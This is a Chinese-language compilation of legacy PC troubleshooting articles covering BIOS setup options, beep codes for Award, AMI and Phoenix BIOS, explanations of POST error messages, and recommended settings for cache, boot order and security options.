    LBA/Large: 硬盘LBA/Large 模式是否打开。目前540M以上的硬盘都要将此选项打开(On)，但在Novell Netware 3.xx或4.xx版等网络操作系统下要视情况将它关掉(Off)。
    Block Mode: 将此选项设为On，有助于硬盘存取速度加快，但有些旧硬盘不支持此模式，必须将此选项设为Off。32 Bit Mode: 将此选项设为On，有助于在32位的操作系统（如WIN95/NT）下加快硬盘传输速度，有些旧硬盘不支持此模式，必须将此选项设为Off。
    PIO Mode: 支持PIO Mode0～Mode5(DMA/33)。用BIOS程序自动检查硬盘时，会自动设置硬盘的PIO Mode。
    注意：当你在系统中接上一台IDE设备（如硬盘、光驱等）时，最好进入BIOS，让它自动检测。如果使用的是抽屉式硬盘的话，可将Type设成Auto，或将Primary以及Secondary的Type都改成 Auto 即可。所谓Primary指的是第一IDE接口，对应于主板上的IDE0插口，Secondary指的是第二IDE接口，对应于主板上的IDE1插口。每个IDE接口可接Master/Slave（主/从）两台IDE设备。
Advanced Setup（高级设定）窗口
    1st/2rd/3rd/4th Boot Device: 开机启动设备的顺序，可选择由IDE0～3、SCSI、光驱、软驱、 Floptical (LS－120大容量软驱)或由Network(网络)开机。
    S.M.A.R.T For HardDisk: 开启（Enable）硬盘S.M.A.R.T 功能。如果硬盘支持，此功能可提供硬盘自我监控的功能。
    Quick Boot: 开启此功能后，可使开机速度加快。
    Floppy Drive Swap: 若将此功能Enable，可使A驱与B驱互换。
    PS/2 Mouse Support : 是否开启PS/2鼠标口，若设定为Enable，则开机时，将IRQ12保留给PS/2鼠标使用，若设定为Disable，则IRQ12留给系统使用。
    Password Check: 设定何时检查Password(口令)，若设定成Setup时，每次进入BIOS设定时将会要求输入口令，若设定成Always时，进入BIOS或系统开机时，都会要求输入口令，但先决条件是必须先设定口令(Security窗口中的User选项)。
    Primary Display: 设定显示卡的种类。
    Internal Cache: 是否开启CPU内部高速缓存（L1 Cache），应设为Enable。
    External Cache: 是否开启主板上的高速缓存（L2 Cache），应设为Enable。
    System BIOS Cacheable: 是否将系统BIOS程序复制到内存中，以加快BIOS 存取速度。
    C000－DC00，16K Shadow: 此8项是将主内存的UpperMemory（上位内存区）开启，将所有插卡上 ROM程序映射到内存中，以加快CPU对BIOS的执行效率。Disable:不开启本功能；Enable:开启，且可提供读写区段功能；Cached:开启，但不提供读写功能。
Chipset Setup（芯片组设定）窗口
    本功能中的选项有助于系统效率的提升，建议使用默认值。若将某些Chipset、DRAM/SDRAM或SRAM 部分的Timing值设得过快，可能会导致系统"死机"或运行不稳定，这时可试着将某些选项的速度值设定慢一点。
    USB Function Enabled: 此选项可开启USB接口的功能，如没有USB设备，建议将此选项设为Disable， 否则会浪费一个IRQ资源。
    DRAM Write Timing: 设定DRAM的写入时序，建议值如下: 70ns DRAM: X－3－3－3； 60ns DRAM: X－2－2－2。
    Page Mode DRAM Read Timing: 设定DRAM读取时序，建议值如下 : 70ns DRAM: X－4－4－4； 60ns DRAM: X－3－3－3。
    RAS Precharge Period: 设定DRAM/EDO RAM的Precharge（预充电）时间，建议设成4T。
    RAS to CAS Delay Time: 设定DRAM中RAS到CAS延迟时间，建议设定成3T。
    EDO DRAM Read Timing: 设定EDO DRAM读取时序，建议值如下: 70ns DRAM : X－3－3－3； 60ns DRAM : X－2－2－2。
    DRAM Speculative Read: 此选项是设定DRAM推测性的引导读取时序，建议设定成Disable。
    SDRAM CAS Latency: 设定SDRAM的CAS信号延迟时序，建议设定值如下 :
    15ns(66MHz)/12ns(75MHz) SDRAM: 3
    10ns(100MHz) SDRAM: 2。
    SDRAM Timing: 设定SDRAM(同步内存)的时序，建议设定值如下:
    15ns(66MHz)/12ns(75MHz) SDRAM: 3－6－9
    10ns(100MHz) SDRAM: 3－4－7。
    注意：若系统使用SDRAM不稳时，建议将SDRAM速度调慢。
    SDRAM Speculative Read : 此选项是设定SDRAM推测性的引导读取时序，建议设定成Disable。
    Pipe Function: 此选项设定是否开启Pipe Function（管道功能），建议设定成Enable。
    Slow Refresh: 设定DRAM的刷新速率，有15/30/60/120us ，建议设在60us。
    Primary Frame Buffer: 此选项保留，建议设定成Disable。
    VGA Frame Buffer: 设定是否开启VGA帧缓冲，建议设为Enable。
    Passive Release: 设定Passive Release（被动释放）为Enable时，可确保CPU与PCI总线主控芯片（PCI Bus Master）能随时重获对总线的控制权。
    ISA Line Buffer: 是否开启ISA总线的Line Buffer，建议设为Enable。
    Delay Transaction: 设定是否开启芯片组内部的Delay Transaction（延时传送），建议设成 Disable。
    AT Bus Clock: 设定ISA总线时钟，建议设成Auto。
Power Management Setup（能源管理）窗口
    能源管理功能可使大部份周边设备在闲置时进入省电功能模示，减少耗电量，达到节约能源的目的。电脑在平常操作时，是工作在全速模式状态，而电源管理程序会监视系统的图形、串并口、硬盘的存取、键盘、鼠标及其他设备的工作状态，如果上述设备都处于停顿状态，则系统就
会进入省电模式，当有任何监控事件发生，系统即刻回到全速工作模式的状态。省电模式又分为“全速模式(Normal)、打盹模式 (Doze)、待命模式(Standby)、沉睡模式(Suspend)"，系统耗电量大小顺序:Normal>Doze> Standby > Suspend。
    Power Management/APM: 是否开启APM省电功能。若开启(Enable)，则可设定省电功能。
    Green PC Monitor Power State/Video Power Down Mode/Hard Disk Power Down Mode :设定显示器、显示卡以及硬盘是否开启省电模式，可设定成Standby、Suspend以及Off(即不进入省电模式)。
    Video Power Down Mode: 设定显示器在省电模式下的状态 isable: 不设定 ；Stand By: 待命模式；Suspend: 沉睡模式。
    Hard Disk Power Down Mode: 设定硬盘在省电模式下的状态。（同上）
    Standby Timeout/Suspend Timeout: 本选项可设定系统在闲置几分钟后，依序进入Standby Mode/Suspend Mode等省电模式。
    Display Activity: 当系统进入Standby Mode时，显示器是否进入省电模示，Ingroe:忽略不管；Monitor:开启。
    Monitor Serial Port/Paralell Port/Pri－HDD/Sec－ HDD/VGA /Audio/Floppy: 当系统进入省电模式后，是否监视串并行口、主从硬盘、显示卡、声卡、软驱的动作。Yes:监视，即各设备如有动作，则系统恢复到全速工作模式；N不监视。
    Power Button Override: 是否开启电源开关功能。
    Power Button Function: 此选项是设定当使用ATX电源时，电源按扭（SUS－SW） 的作用。
Soft Off: 按一次就进入Suspend Mode，再按一次就恢复运行。Green: 按第一下便是开机，关机时要按住4秒。
    Ring resume From Soft Off:是否开启Modem唤醒功能。
    RTC Alarm Resume From Soft Off: 是否设定BIOS 定时开机功能。
PCI/PnP Setup窗口
    此选项可设定即插即用(PnP)功能。
    OnBoard USB: 是否开启芯片组中的USB功能。
    Plug and Play Aware OS: 如你的操作系统(OS)具有PnP功能(如 Win95)，此项应选Yes；若不是，则选No。如某些 PnP卡无法检测到时，建议设成No。
    PCI Latency Timer: 此选项可设定PCI时钟的延迟时序。
    Offboard PCI IDE Card: 如使用了其它的PCI IDE卡，则此项必须设定，这要视你的PCI IDE卡是插在哪个Slot(1－4)上而定，并设定以下各IDE IRQ 值。Slot5、6以及Hardwared为保留选项。
    Offboard PCI IDE Primary IRQ: 设定PCI IDE卡上IDE 0所要占用的INT＃ ，一般都是设定成INT＃A。
    Offboard PCI IDE Secondary IRQ: 设定PCI IDE卡上IDE 1所要占用的INT＃，一般都是设定成 INT＃B。
    Assign IRQ to PCI VGA Card: 指定一个IRQ给VGA卡使用，一般不用指定IRQ给VGA卡。
    IRQ 3、4、5、7、9、10、11、12、14、15/DMA Channel 0、1、3、5、6、7:本选项是设定各IRQ/DMA 是否让PnP卡自动配置，若设定成PCI/PnP，则BIOS检测到PnP卡时，会挑选你所有设成PCI/PnP状态的其中一个IRQ/DMA来使用；反之，若设成ISA/EISA，则BIOS 将不会自动配置。一般设为PCI/PnP。
Peripheral Setup（外围设备设定）窗口
    Onboard FDC: 是否启用主板上的软驱接口。
    Onboard Serial Port 1: 选择串行口1（COM1）的地址，一般设成Auto。
    Serial Port1 IRQ: 此选项可设定串行口1的IRQ，建议设成4。
    Onboard Serial Port 2: 选择串行口2的地址， 一般设成Auto。
    Serial Port2 Mode : 若设成 Normal，为一般接鼠标、Modem用；如有红外线装置(IrDA)，则建议设成IrDA ASKIR。
    Serial Port2 IRQ: 此选项可设定串行口2的IRQ，建议设成3。
    Onboard Parallel Port: 选择并行口的地址。
    Onboard Parallel Mode: 选择并行口的传输模式(ECP/EPP/Normal)。默认为标准模式(Normal)。
    Parallel Mode IRQ : 设定并行口IRQ，建议设定成7。
    EPP Version: 设定EPP Mode为1.7或1.9 版。
    Onboard IDE : 是否启用主板上的PCI IDE0、IDE1接口。如果采用外接的IDE卡，则此项必须改成 Disable，反之则设成Both。此选项若设错，将会导致硬盘、光驱等IDE设备检测不到。
Security(安全）窗口
    User:允许User(用户)设定密码，输入密码后，必须再输入一次确认。
    Anti－Virus：此选项开启后，可防止病毒入侵硬盘的Boot区以及BIOS。
Utility (实用)窗口
    Detect IDE：此功能可以自动检测所有接在IDE0及IDE1上的设备，包括硬盘、CD－ROM、LS－120等，且会自动判断其PIO模式，以及LBA/Normal/Large模式，一次即可检测完毕。

BIOS启动报警声全集

当打开电脑时，听到的不是平时清脆的启动声，而是一次又一次重复的奇怪的报警声时，或面对着不同BIOS的报警声，你能不能马上判断出故障的所在呢？虽然现在多家厂商都设计出一些智能化的功能，能将报警声转换成语音或是指示灯等。但是有这种功能的主板的价格比普通的主板要高出许多，这类主板除了少数的电脑发烧狂和一些大款外，有谁愿多花钱去买这种主板呢。所以，本人总结了一下，将各种BIOS的报警声所对应的故障列出来，希望对大家有所帮助。

Award BIOS：
1短：系统正常启动。
2短：常规错误。解决方法：重设BIOS。
1长1短：RAM或主板出错。
1长2短：显示器或显示卡错误。
1长3短：键盘控制器错误。
1长9短：主板Flash RAM或EPROM错误，BIOS损坏。
不断地响（长声）：内存条未插紧或损坏。
不停地响：电源、显示器未和显卡连接好。
重复短响：电源有问题。
无声音无显示：电源有问题。

AWI BIOS：
1短：内存刷新失败。解决方法，更换内存条。
2短：内存ECC校验错误。解决方法：进入CMOS设置，将ECC校验关闭。
3短：系统基本内存（第1个64KB）检查失败。
4短：系统时钟出错。
5短：CPU错误。
6短：键盘控制器错误。
7短：系统实模式错误，不能切换到保护模式。
8短：显示内存错误。注：显卡内存简称显存。
9短：ROM BIOS检验和错误。
1长3短：内存错误。
1长8短：显示测试错误。

Phoenix BIOS
1短：系统启动正常。
1短1短1短：系统加电自检初始化失败。
1短1短2短：主板错误。
1短1短3短：CMOS或电池错误。
1短1短4短：ROM BIOS校验失败。
1短2短1短：系统时钟错误。
1短2短2短：DMA初始化失败。
1短2短3短：DMA页寄存器错误。
1短3短1短：RAM刷新错误。
1短3短2短：基本内存错误。
1短3短3短：基本内存错误。
1短4短1短：基本内存地址线错误。
1短4短2短：基本内存校验错误。
1短4短3短：EISA时序器错误。
1短4短4短：EASA NMI口错误。
2短1短2短到2短4短4短（即所有开始为2短的声音的组合）：基本内存错误。
3短1短1短：从DMA寄存器错误。
3短1短2短：主DMA寄存器错误。
3短1短3短：主中断处理寄存器错误。
3短1短4短：从中断处理寄存器错误。
3短2短4短：键盘控制器错误。
3短3短4短：显示卡内存错误。
3短4短2短：显示错误。
3短4短3短：未发现显示只读存储器。
4短2短1短：时钟错误。
4短2短2短：关机错误。
4短2短3短：A20门错误。
4短2短4短：保护模式中断错误。
4短3短1短：内存错误。
4短3短3短：时钟2错误。
4短3短4短：实时钟错误。
4短4短1短：串行口错误。
4短4短2短：并行口错误。
4短4短3短：数字协处理器错误。

兼容BIOS:
1短：系统正常。
2短：系统加电自检（POST）失败。
1长：电源错误，如果无显示，则为显示卡错误。
1长1短：主板错误。
1长2短：显卡错误。
1短1短1短：电源错误。
3长1短：键盘错误。


BB是报警的声音

《一键清理系统垃圾》

BB是报警的声音

你可以根据报警声音长短,数目来判断问题出在什么地方
AWARD BIOS响铃声的一般含义是：
1短: 系统正常启动。这是我们每天都能听到的，也表明机器没有任何问题。
2短: 常规错误，请进入CMOS Setup，重新设置不正确的选项。
1长1短: RAM或主板出错。换一条内存试试，若还是不行，只好更换主板。
1长2短: 显示器或显示卡错误。
1长3短: 键盘控制器错误。检查主板。
1长9短: 主板Flash RAM或EPROM错误，BIOS损坏。换块Flash RAM试试。
不断地响（长声）: 内存条未插紧或损坏。重插内存条，若还是不行，只有更换一条内存。
不停地响: 电源、显示器未和显示卡连接好。检查一下所有的插头。
重复短响: 电源问题。
无声音无显示: 电源问题。

AMI BIOS响铃声的一般含义是：
    1. 一短声，内存刷新失败。内存损坏比较严重，恐怕非得更换内存不可。
    2. 二短声，内存奇偶校验错误。可以进入CMOS设置，将内存Parity奇偶校验选项关掉，即设置为Disabled。不过一般来说，内存条有奇偶校验并且在CMOS设置中打开奇偶校验，这对微机系统的稳定性是有好处的。
    3. 三短声，系统基本内存（第1个64Kb）检查失败。更换内存吧。
    4. 四短声，系统时钟出错。维修或更换主板。
    5. 五短声，CPU错误。但未必全是CPU本身的错，也可能是CPU插座或其它什么地方有问题，如果此CPU在其它主板上正常，则肯定错误在于主板。
    6. 六短声，键盘控制器错误。如果是键盘没插上，那好办，插上就行；如果键盘连接正常但有错误提示，则不妨换一个好的键盘试试；否则就是键盘控制芯片或相关的部位有问题了。
    7. 七短声，系统实模式错误，不能切换到保护模式。这也属于主板的错。
    8. 八短声，显存读/写错误。显卡上的存贮芯片可能有损坏的。如果存贮片是可插拔的，只要找出坏片并更换就行，否则显卡需要维修或更换。
    9. 九短声，ROM BIOS检验出错。换块同类型的好BIOS试试，如果证明BIOS有问题，你可以采用重写甚至热插拔的方法试图恢复。
    10. 十短声，寄存器读/写错误。只能是维修或更换主板。
    11. 十一短声，高速缓存错误。
    12. 如果听不到beep响铃声也看不到屏幕显示，首先应该检查一下电源是否接好，在检修时往往容易疏忽，不接上主板电源就开机测试。其次得看看是不是少插了什么部件，如CPU、内存条等。再次，拔掉所有的有疑问的插卡，只留显示卡试试。最后找到主板上清除（clear）CMOS设置的跳线，清除CMOS设置，让BIOS回到出厂时状态。如果显示器或显示卡以及连线都没有问题，CPU和内存也没有问题，经过以上这些步骤后，微机在开机时还是没有显示或响铃声，那就只能是主板的问题了。

POENIX的BIOS报警声（以前的老板上有许多POENIX的，可现在已经被AWARD收购了）
1短 系统启动正常
1短1短1短 系统加电初始化失败
1短1短2短 主板错误
1短1短3短 CMOS或电池失效
1短1短4短 ROM BIOS校验错误
1短2短1短 系统时钟错误
1短2短2短 DMA初始化失败
1短2短3短 DMA页寄存器错误
1短3短1短 RAM刷新错误
1短3短2短 基本内存错误
1短3短3短 基本内存错误
1短4短1短 基本内存地址线错误
1短4短2短 基本内存校验错误
1短4短3短 EISA时序器错误
1短4短4短 EISA NMI口错误
2短1短1短 前64K基本内存错误
3短1短1短 DMA寄存器错误
3短1短2短 主DMA寄存器错误
3短1短3短 主中断处理寄存器错误
3短1短4短 从中断处理寄存器错误
3短2短4短 键盘控制器错误
3短1短3短 主中断处理寄存器错误
3短4短2短 显示错误
3短4短3短 时钟错误
4短2短2短 关机错误
4短2短3短 A20门错误
4短2短4短 保护模式中断错误
4短3短1短 内存错误
4短3短3短 时钟2错误
4短3短4短 时钟错误
4短4短1短 串行口错误
4短4短2短 并行口错误
4短4短3短 数字协处理器错误


BIOS报警详解

《一键清理系统垃圾》

BIOS报警详解

Award BIOS

1短：系统正常启动。表明机器没有任何问题。
2短：常规错误，请进入CMOS Setup，重新设置不正确的选项。
1长1短：内存或主板出错。换一条内存试试，若还是不行，只好更换主板。
1长2短：显示器或显示卡错误。
1长3短：键盘控制器错误。检查主板。
1长9短：主板Flash RAM或EPROM错误，BIOS损坏。换块Flash RAM试试。
不断地响(长声)：内存条未插紧或损坏。重插内存条，或更换内存。

AMI BIOS

1短：内存刷新失败。更换内存条。
2短：内存ECC较验错误。在CMOS
Setup中将内存关于ECC校验的选项设为Disabled就可以解决，不过最根本的解决办法还是更换一条内存。
3短：系统基本内存检查失败。换内存。
4短：系统时钟出错。
5短：CPU出现错误。
6短：键盘控制器错误。
7短：系统实模式错误，不能切换到保护模式。
8短：显示内存错误。显示内存有问题，更换显卡试试。
9短：BIOS芯片检验和错误。
1长3短：内存错误。内存损坏，更换即可。
1长8短：显示测试错误。显示器数据线没插好或显示卡没插牢。

Phoenix BIOS

1短 系统启动正常
1短1短1短 系统初始化失败
1短1短2短 主板错误
1短1短3短 CMOS或电池失效
1短1短4短 ROM BIOS校验错误
1短2短1短 系统时钟错误
3短2短4短 键盘控制器错误
3短3短4短 显示内存错误
3短4短2短 显示错误
4短2短1短 时钟错误
4短2短2短 关机错误
4短3短1短 内存错误
4短4短1短 串行口错误
4短4短2短 并行口错误

Award BIOS自检响铃含义：

    不停地响：电源、显示器未和显示卡连接好。检查一下所有的插头。

    重复短响：电源有问题。

    无声音无显示：电源有问题


开机BIOS语言

《一键清理系统垃圾》

开机BIOS语言

开机自检时出现问题后会出现各种各样的英文短句，短句中包含了非常重要的信息，读懂这些信息可以自己解决一些小问题，可是这些英文难倒了一部分朋友，下面是一些常见的BIOS短句的解释，大家可以参考一下。

1.CMOS battery failed

中文：CMOS电池失效。

解释：这说明CMOS电池已经快没电了，只要更换新的电池即可。

2.CMOS check sum error－Defaults loaded

中文：CMOS 执行全部检查时发现错误，要载入系统预设值。

解释：一般来说出现这句话都是说电池快没电了，可以先换个电池试试，如果问题还是没有解决，那么说明CMOS RAM可能有问题，如果没过一年就到经销商处换一块主板，过了一年就让经销商送回生产厂家修一下吧！

3.Press ESC to skip memory test

中文：正在进行内存检查，可按ESC键跳过。

解释：这是因为在CMOS内没有设定跳过存储器的第二、三、四次测试，开机就会执行四次内存测试，当然你也可以按 ESC 键结束内存检查，不过每次都要这样太麻烦了，你可以进入COMS设置后选择BIOS FEATURS SETUP，将其中的Quick Power On Self Test设为Enabled，储存后重新启动即可。

4.Keyboard error or no keyboard present

中文：键盘错误或者未接键盘。

解释：检查一下键盘的连线是否松动或者损坏。

5.Hard disk install failure

中文：硬盘安装失败。

解释：这是因为硬盘的电源线或数据线可能未接好或者硬盘跳线设置不当。你可以检查一下硬盘的各根连线是否插好，看看同一根数据线上的两个硬盘的跳线的设置是否一样，如果一样，只要将两个硬盘的跳线设置的不一样即可（一个设为Master，另一个设为Slave）。

6.Secondary slave hard fail

中文：检测从盘失败

解释：可能是CMOS设置不当，比如说没有从盘但在CMOS里设为有从盘，那么就会出现错误，这时可以进入COMS设置选择IDE HDD AUTO DETECTION进行硬盘自动侦测。也可能是硬盘的电源线、数据线可能未接好或者硬盘跳线设置不当，解决方法参照第5条。

7.Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40)

中文：无法驱动软盘驱动器。

解释：系统提示找不到软驱，看看软驱的电源线和数据线有没有松动或者是接错，或者是把软驱放到另一台机子上试一试，如果这些都不行，那么只好再买一个了，好在软驱还不贵。

8.Hard disk(s) diagnosis fail

中文：执行硬盘诊断时发生错误。

解释：出现这个问题一般就是说硬盘本身出现故障了，你可以把硬盘放到另一台机子上试一试，如果问题还是没有解决，只能去修一下了。

9.Memory test fail

中文：内存检测失败。

解释：重新插拔一下内存条，看看是否能解决，出现这种问题一般是因为内存条互相不兼容,去换一条吧！

10.Override enable－Defaults loaded

中文：当前CMOS设定无法启动系统，载入BIOS中的预设值以便启动系统。

解释：一般是在COMS内的设定出现错误，只要进入COMS设置选择LOAD SETUP DEFAULTS载入系统原来的设定值然后重新启动即可。

11.Press TAB to show POST screen

中文：按TAB键可以切换屏幕显示。

解释：有的OEM厂商会以自己设计的显示画面来取代BIOS预设的开机显示画面，我们可以按TAB键来在BIOS预设的开机画面与厂商的自定义画面之间进行切换。

12.Resuming from disk，Press TAB to show POST screen

中文：从硬盘恢复开机，按TAB显示开机自检画面）。

解释：这是因为有的主板的BIOS提供了Suspend to disk(将硬盘挂起)的功能，如果我们用Suspend to disk的方式来关机，那么我们在下次开机时就会显示此提示消息。

13.Hareware Monitor found an error，enter POWER MANAGEMENT SETUP for details，Press F1 to continue，DEL to enter SETUP

中文：监视功能发现错误，进入POWER MANAGEMENT SETUP察看详细资料，按F1键继续开机程序，按DEL键进入COMS设置。

解释：有的主板具备硬件的监视功能，可以设定主板与CPU的温度监视、电压调整器的电压输出准位监视和对各个风扇转速的监视，当上述监视功能在开机时发觉有异常情况，那么便会出现上述这段话，这时可以进入COMS设置选择POWER MANAGEMENT SETUP，在右面的**Fan Monitor**、**Thermal Monitor**和**Voltage Monitor**察看是哪部分发出了异常，然后再加以解决。


BIOS的设置及其影响

《一键清理系统垃圾》

BIOS的设置及其影响

估计现在许多读者已经成为能够自由修改WINDOWS注册表的老鸟了，但是老鸟们是不是能够像修改注册表一样自如的设置BIOS以及知道BIOS设置中各项参数的意义呢？其实在BIOS中有许多默认的设置是牺牲了性能来换取稳定的，本着DIY的精神，为了读者们的爱机着想，今天就来介绍一下BIOS设置中各个高级选项的意义，故障解决的和优化设置的方法。

一．BIOS Features Setup

1．Virus Warning / Anti-Virus Protection (病毒警告/防毒保护)

选项：Enabled, Disabled`, ChipAway

     当这个选项被设为Enable时，如果有任何软件正在尝试要改写引导扇区或者文件分配表时，Bios就会自动弹出一个警告窗口，说某某软件正在改写引导扇区或者文件分配表。这时如果你想通过Bios来禁止任何软件改写引导扇区或者文件分配表可以打开这个选项。当然值得注意的是这个功能只能保护引导区以及文件分配表不被改写，而不能保证硬盘上的内容不被病毒感染或是被其他磁盘工具改写。

    值得注意的一点的是，当这个选项被设Enable时，使用一些磁盘工具或者在安装Windows95/98时候系统报错，并且安装失败。因此要注意，安装Windows时要关闭这个选项，安装才能顺利进行。有一次我就是把这个选项打开来安装Win98,结果安装过程中进行到一半的时候就会死机，开始以为是CPU超频太高了导致Window不能正常安装，结果先是把CPU降频，问题还是没有解决，结果我不小心再BIOS选项中读取了BIOS的默认设置才解决问题。

    有些主板厂家在BIOS中内置了病毒代码，使系统能在启动时不受到一些引导型病毒的攻击，但是现在的病毒更新的速度远远的快于主板病毒代码更新的速度，打开这个选项并不能有效的防止现在流行病毒的攻击，不过至少可以防止一些古老的病毒的攻击，建议打开这个选项，反正消耗的资源并不多。

2．CPU Level 1 Cache（CPU一级缓存）

选项： Enable, Disable

    这个BIOS选项是用来打开或禁止CPU的一级缓存。当然，一般情况下，为了系统性能，强烈建议打开这个选项。但是，这个功能主要是为了一些超频爱好者来设置的，比如说在打开了CPU得一级缓存的情况下，一个赛扬300A最高能超到450MHZ,但是如果关闭了一级缓存，有可能再超一档，而且会更加稳定。当然只有超频的骨灰级玩家才会这么做，因为，关闭了CPU的一级缓存，系统不知道会慢成怎么样。

3．CPU Level 2 Cache（CPU二级缓存）

选项： Enable, Disable

    这个选项是用来打开或者关闭CPU的二级缓存的。主要功能也是为了超频的稳定。基于Intel CPU的二级缓存集成在CPU上，而Socket7主板的二级缓存则是集成在主板上的。关闭了二级缓存之后，CPU的超频性能会更好，但是总体性能上会牺牲不少。这就是缺少了二级缓存的赛扬266比同频的P266更好超，但是总体性能总是上不来的主要原因。

4.CPU L2 Cache ECC Checking（CPU二级缓存ECC校验）

选项： Enable, Disable

    这个选项用打开或是关闭主板二级缓存的纠错功能。（有些主板有这个功能，有些没有）。建议打开这个选项，因为打开了这个功能之后，BIOS就能自动检测并纠正储存在二级缓存上的数据，这样能使系统更加稳定。尤其是对一些在超频后经常出错的系统来说，打开就错功能明显能使出错的几率大大的减少。但是纠错是以牺牲系统性能的情况下进行的，而且一些能超更高的CPU会因为打开了就错功能之后可超性会变得更差。看来稳定与速度是不可兼得的，这就要看你怎么考虑了。

５．Quick Power On Self Test(快速自检)

    打开了这个选项后，系统会忽略BIOS自荐的某些过程，使启动速度更快。但是在更改了硬件的配置或者在系统自检时报错之后，可以关闭这个选项，使BIOS进行一次更全面的检测，当然，自检之后又可以从新打开这个选项。

６．Boot Sequence（启动顺序）

选项：

A, C, SCSI/EXT
C, A, SCSI/EXT
C,D-ROM, A
CD-ROM,C, A
D, A, SCSI/EXT (至少需要有两个IDE硬盘)
E, A, SCSI/EXT (至少需要有三个IDE硬盘)
F, A, SCSI (至少需要有四个IDE硬盘)
SCSI/EXT, A, C
SCSI/EXT, C, A
A, SCSI/EXT, C
LS/ZIP,C
    这个选项可以设置BIOS先从那个盘来寻找操作系统，一般来说，操作系统是安装在C盘上的，就应从C盘先启动。如果使用的是SCSI硬盘则应该选择先从SCSI启动的顺序。如果硬盘启动失败时，则因设置先从A盘启动，用启动盘来引导系统，进行修复或者从装系统。在其他时候如果设置从A盘启动，A盘中如果没有引导盘，Windows会提示你先把软盘那出来然后再启动。因此这个选项可以减少BIOS搜寻操作系统的多余步骤，减少启动时间。

    对于一些特殊的主板（如升技的BE6和BP6）,由于板载了特殊的IDE控制器，启动顺序中就会缺少SCSI选项，而多出一个EXT选项。这个选项允许你可以从第三或者第四个IDE设备来启动，或是先从SCSI设备来启动。具体的设置我们在Boot Sequence EXT Means 中再讲解。

７．Boot Sequence EXT Means（启动顺序EXT方式）

选项： IDE, SCSI

    这个功能只有在前面的启动顺序中先选择了EXT才能打开。如果要从第三或者是第四个IDE设备启动，就要先从Boot Sequence启动顺序种选择EXT, C, A ，然后在Boot Sequence EXT Mean种选择IDE。如果要先从SCSI设备先启动，就重复前面的第一个步骤，然后在Boot Sequence EXT Means项中选择SCSI就可以了。

８．Swap Floppy Drive（调转软驱）

选项： Enable, Disable

    这个选项能使你调整软驱的逻辑盘符，当你有两个软驱并且需要更换他们逻辑驱动器的位置时，不用把他们重新拆出来从新调换位置，只要把选项设为Enable就行了。原来的A:驱就会自动映像成B:驱，而B:驱则会变成A:。这个功能主要是为拥有两个格式不同的软驱所准备的。由于BIOS只能从两个软驱中的A:启动，因此只要通过这个选项就可以使BIOS从任何一个软驱启动（当然，要这两个软驱都支持启动才行了!）

９．Boot Up Floppy Seek（启动时搜寻软驱）

选项： Enable, Disable

    这个选项控制的是BIOS在启动时是否自动寻找软驱，如果设为Enable并且BIOS找不到软驱，就会自动弹出一条出错信息，说找不到软驱，同时，BIOS会自动监测软盘是40轨的或是80轨的。当然了，现在就连80轨的软盘都要被淘汰了，更别说是40轨的了。因此这个选项最好设定Disable。

10．Boot Up NumLock Status（启动时小键盘状态）

选项： On, Off

    这个功能控制的是小键盘在启动时的状态。如果设为On时，小键盘将会处于数字状态（用于输入数字）但是如果设为Off的话，小键盘将处于光标控制状态（用于控制光标的方向）。

11．IDE HDD Block Mode（IDE硬盘块模式）

选项： Enabled, Disabled

    它的作用就是使硬盘能够从多个块来传输文件，主要是用来加速硬盘的传输速度。当把它设为Enable时，BIOS将自动检测你的硬盘是否支持这个功能，并且配置好各种参数。如今几乎所有的硬盘都支持这个功能，因此你没有理由禁用这个功能。

    但是说到这里所有的WinNT4.0的用户就要注意了。Windows NT并不支持这个功能，如果打开这个选项的话，系统有可能会丢失数据。所以微软建议WinNT4.0的用户把这个选项关闭。

    不用说，关闭了这个选项之后就会降低硬盘的传输速度。因此的话只有你在使用WinNT是把这个选项关闭。其他的情况下为了提高系统的性能，最好把这个选项设为Enable。

12．Typematic Rate Setting(连续击键率设置)

选项： Enabled, Disabled

    当你需要连续按相同的键时，这个选项允许你控制击健的速度。如果设为Enable时，就可以手动调整键击的速度以及停顿的时间。如果设为Disable时，BIOS将使用默认的设置。

13．Typematic Rate (Chars/Sec)[连续击键率（字符/秒）]

选项： 6, 8, 10, 12, 15, 20, 24, 30

    当你重复按同一个键时，这个选项允许你控制每个字符的重复率，单位是每个字符/秒，不过必须先要在Typematic Rate Setting中设为Enabled。

14．Typematic Rate Delay (Msec)[ 连续击键延迟时间（微秒）]

选项： 250, 500, 750, 1000

    当你重复按同一个键时，这个选项控制的是每个字符的停顿时间，单位是毫秒，即每个字符出现前停顿多少毫秒，当然罗，你要在Typematic Rate Setting中设为Enabled。

15．Security Option（安全选项）

选项： System, Setup

    打开system这个选项后，每次开机的时候就会出现一个输入密码的窗口，只有输入正确的密码才能启动电脑。对于想进入Windows之后使用Esc键跳过，然后修改注册表的不速之客来说这个功能特别有用。每当不速之客想偷偷使用你的电脑时...^_^,只有干瞪眼的份，真么样？乐了吧。当然罗，对于高手老说这也许是小菜一碟，不就是打开机箱给CMOS放电么（犯得着每次使用电脑是还要费那么多工夫么，再说这样的话也会被发现...）。

    至于Setup这个选项吗,就是在进入BIOS是需要输入密码，这个功能的主要作用就是当你是系统管理员时只希望给你的用户使用电脑而禁止他们对BIOS的各项设置进项修改而设置的。:-)

16．Assign IRQ For VGA(为显卡指定IRQ)

选项： Enabled, Disabled

    在这个选中你可以分配一个IRQ给VGA显卡。现在越越来越多的显卡需要分配一个IRQ才能工作，当你使用了这些类型的显卡后并且关闭了这个选项之后就会导致显示质量的下降或者不稳定。所以在设置这个选项之前最好要先检查一下显卡的用户手册，如果显卡需要分配一个IRQ的话最好打开这个选项。如果显卡不需要的话则可以节省下一个IRQ。

17．OS Select For DRAM > 64MB (操作系统选择内存> 64MB )

选项： OS/2, Non-OS/2

    当系统内存大于64MB时，OS/2管理内存的方式与其他的操作系统不同。所以只有在使用IBM 的操作系统OS/2才选为OS/2方式，其他的操作系统一律都选为Non-OS/2。

18．HDD S.M.A.R.T. Capability（硬盘S.M.A.R.T.功能）

选项： Enabled, Disabled

    这个功能用打开或是禁止硬盘的S.M.A.R.T.功能。现在，几乎市面上的硬盘都支持S.M.A.R.T. （自我监测分析以及报告）技术。打开了这个功能之后系统能够随时监测硬盘可能发生的错误，以便在硬盘发生故障之前使你能够有足够的时间来来给你的重要资料作备份，从而挽救了你的重要数据。所以强烈建议打开硬盘的S.M.A.R.T.功能，即使你关闭了这个功能，也不会给系统带来一丝一毫的性能提升。

19．Delay IDE Initial (Sec)（延迟IDE初始时间）

选项： 0,1,2,3, ...., 15

